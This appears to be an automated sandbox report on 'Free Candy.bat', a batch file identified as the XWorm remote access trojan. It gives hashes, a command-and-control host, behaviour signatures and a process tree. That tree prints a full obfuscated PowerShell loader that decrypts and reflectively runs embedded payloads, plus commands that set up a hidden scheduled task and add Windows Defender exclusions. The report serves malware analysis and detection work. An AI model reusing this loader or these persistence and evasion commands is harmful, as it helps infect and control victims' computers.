Analysis

  • max time kernel
    316s
  • max time network
    1050s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    06/08/2024, 04:05

General

  • Target

    Free Candy.bat

  • Size

    726KB

  • MD5

    5f14117f1fd87fa46fb37b56e87f0e7f

  • SHA1

    50a2950aaad34258933cf10f78195b61f870ee7d

  • SHA256

    e4a9f2d41890743f9447638f1af46aa2cc6f6025846df8e32915de8fcd9ab1ae

  • SHA512

    1ee17349daf18ed02a3cb3b67d8987a0bd7287ffe2bb2c0cf5ad5004a14c5e73de847f75a6390d24f1d1ccd619ae63d177a9c218fd4bc4b9f8ddadb105c890a0

  • SSDEEP

    12288:jRqwpZL+rpkFQN7X/oWnNVnh9E8pW9IGsHmcTAl79RCMzTindB:jRL6lpvoWL/EF9IYcTiSWcB

Malware Config

Extracted

Family

xworm

C2

hard-tyler.gl.at.ply.gg:27490

Attributes
  • Install_directory

    %Temp%

  • install_file

    systemprocess.exe

Signatures

  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell and hide display window.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Free Candy.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4240
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Free Candy.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Free Candy.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2956
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_486_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_486.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:368
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_486.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1100
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_486.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4296
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_486.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_486.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1932
            • C:\Users\Admin\AppData\Local\Temp\XClient.exe
              "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
              6⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3232
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4244
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4184
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2896
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1516
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2656
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:776
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2088
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4952

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          ad5cd538ca58cb28ede39c108acb5785

          SHA1

          1ae910026f3dbe90ed025e9e96ead2b5399be877

          SHA256

          c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

          SHA512

          c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          7322f8982b99625fe93a8fc5b7a9c207

          SHA1

          3fdf5fc612042d0775fcb02b29abf4b643c700cf

          SHA256

          87293555fccc4e9eff83637b1355bc382caacb88214a462a49f0bb2198c9a027

          SHA512

          df1d4bc314351a3d24f81354fba44f0044428171c97ca5e3206c3fbcd15c8ea53340559c713f33520199d49290a03804122e88f78ba956601d87a68b2a25bfd9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          6bf6f1381774e9a5fb50b4ff461acd2f

          SHA1

          4f0f8969c1ed6763c902706556ba5f2edb55c1fb

          SHA256

          f6a2d2d403e3263863be578410274191d6ceefd5f078ab5a3ff1760d0d32a5b2

          SHA512

          1f9bc916167fce8f83d3bf75fe51b4fe29b0b5eb812373d11f1bfe6d0a56ff635dd66a88a25df6b3e6c83fff43dadf04fa3a09c16ceed0ca68cfb170c352059e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          271caaf0bd0a4025bfa065060194c27d

          SHA1

          ad3276800ec24772cbd1f800a3ba142011d8d6de

          SHA256

          d4f0ca867164c7e4a310d87493ca4d3955c4b4613681727f277b3c7b0e9a1058

          SHA512

          0df809ebae9d4b4d6174eed0ef76d7d46a9a40433cb888f92f9dfc1eb396677b15ec7b0f1ec3eabc625c35052660fbe4d940628439e368e57b3840352b9ae45f

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          23a1d2842af60b4b19067fbe9cb767ac

          SHA1

          ce62748a375cfedc84f288459695a2f05a764228

          SHA256

          a26e0cea1a9d1312891e65b6e4b04b755debb62b72e379cdda7137eb893f6705

          SHA512

          b898016554bf1bb9b4af096134f60c25390c54c184c04d8129e15f2e56f07f2ee194055eb2dfa3ec51e67cbc41486cd4c1cfb123be4512c5ad4e6f4b280884c7

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          2ce22617390a2d7e3e6158b4a00a6bfe

          SHA1

          3eee336da0ee190729893be64a9d7a323077162e

          SHA256

          858e5d5fcdc436725a43a5a279f7b292b205c7bcda262d4d497851b72881b3e7

          SHA512

          650e7c2de59e5596060378fede79e2e52d0982f2d17a1a68e1584a512ae083e082da32643c02d9bfec7264dc64fa11c5777151f37016cf9d210b876a57e09b17

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          077f8ce6994d0bcb9e0a44a174aafe90

          SHA1

          517eaa5d45ec6ee0aa2f7a2979637259737e6b48

          SHA256

          88a11b94216d5a6e9f60bf266216a3b3bd45ceae9a815dda2c5b8cf7f96a17c9

          SHA512

          de8699327bc327aab0440ee41d01bae106aacbe4d7b701737330ea8ead5cd1918817c372acd9d2a9629414cf6d79b00715a7c0b00ad0be8baf83bdf4bbebee33

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          f8840883fd351d8974bf41834d1d05cd

          SHA1

          3da96fa370c2cd02ec880e99b25a48fc852e85e8

          SHA256

          4dbdb5f6330c5808a252f69bf09744d190e3e9515421780ba625707aada60fd2

          SHA512

          1cd345591cbfaa7a7279deb46b689b17828b71962418fecb882eb50f4d15fbbe9c9d38893f0858e6168e65879ae33baba81492de0fbfe9c9d2b6128e30b6cd99

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          7c063219527a7709eacae3b97197e0ff

          SHA1

          aec6bb765534427b6564f486fb62651076a36f80

          SHA256

          96dfc43d1b2be59f2ba61ec20ca12f9c17f57fe6c4e919883a10387f1065d571

          SHA512

          35580b9f2ee14c2f08762c3f1bf41ceafe1bb20498cc0b8fe74e9f7d6ff81e17f252810764d0ac85f4647b3995c5d5b93351c98bad4921e60c90877c7ea6bb8f

        • C:\Users\Admin\AppData\Local\Temp\XClient.exe

          Filesize

          292KB

          MD5

          06aa0446d6ce7b7d44270ef4218793cf

          SHA1

          2ae7b6b80a4025c262aa6f38db7bd1ece676648d

          SHA256

          db7b93708805fbcf98f5fd0068b24becf4e1f11371ed2f6f58e3bafb9c272068

          SHA512

          49220519f8f773bd0c74e2eb8cec902071026741ecd88453d2c4dc5ee78175f67320c9cba0d81e9858f1180573df0068ab570a967af5d7076e803ad71d9a6971

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejrd3ybe.5pm.ps1

          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk

          Filesize

          1KB

          MD5

          77c82bb0253e8178c6bb071fdb044460

          SHA1

          d631d03015d7dbfd20056351c8e034c0eea39a36

          SHA256

          ef83347531c4a3e0574542ce5c717df690666c518bf5d2e4eda5e29978d788e9

          SHA512

          ba6fdad9f948e5396198927eab33aa9325b01a438424b06d0dc22aa995f9b519f3c1f42561b0b1234877bdc00a9efb99db3e2674ea0c1c1f9e4142b98ad7bb63

        • C:\Users\Admin\AppData\Roaming\startup_str_486.bat

          Filesize

          726KB

          MD5

          5f14117f1fd87fa46fb37b56e87f0e7f

          SHA1

          50a2950aaad34258933cf10f78195b61f870ee7d

          SHA256

          e4a9f2d41890743f9447638f1af46aa2cc6f6025846df8e32915de8fcd9ab1ae

          SHA512

          1ee17349daf18ed02a3cb3b67d8987a0bd7287ffe2bb2c0cf5ad5004a14c5e73de847f75a6390d24f1d1ccd619ae63d177a9c218fd4bc4b9f8ddadb105c890a0

        • C:\Users\Admin\AppData\Roaming\startup_str_486.vbs

          Filesize

          115B

          MD5

          af1f80cef9fd6fd2e4ad2c02357b2587

          SHA1

          0a45e2b8906b2a553d40a7d3d64f59d44b413903

          SHA256

          eb83a117038f397ff5a43d323b690ca30b866e5bf0cac52577ef7bb52e02aa75

          SHA512

          1a743034f8a543249dd0c6d2842ee996bcab8080b222eae96af966ece89fd65dc26e4903722ee3da1f33ef0ae718466fb57b99e36daf6778957387723f7ae67b

        • memory/368-41-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

          Filesize

          9.9MB

        • memory/368-74-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

          Filesize

          9.9MB

        • memory/368-42-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

          Filesize

          9.9MB

        • memory/1932-114-0x000001D44C5A0000-0x000001D44C5F0000-memory.dmp

          Filesize

          320KB

        • memory/2956-12-0x00000233EE9B0000-0x00000233EEA26000-memory.dmp

          Filesize

          472KB

        • memory/2956-126-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

          Filesize

          9.9MB

        • memory/2956-28-0x00000233EE9A0000-0x00000233EE9A8000-memory.dmp

          Filesize

          32KB

        • memory/2956-6-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

          Filesize

          9.9MB

        • memory/2956-25-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

          Filesize

          9.9MB

        • memory/2956-3-0x00007FFE28E63000-0x00007FFE28E64000-memory.dmp

          Filesize

          4KB

        • memory/2956-9-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

          Filesize

          9.9MB

        • memory/2956-29-0x00000233EEA30000-0x00000233EEAD6000-memory.dmp

          Filesize

          664KB

        • memory/2956-5-0x00000233EE800000-0x00000233EE822000-memory.dmp

          Filesize

          136KB

        • memory/3232-125-0x0000000000600000-0x000000000064E000-memory.dmp

          Filesize

          312KB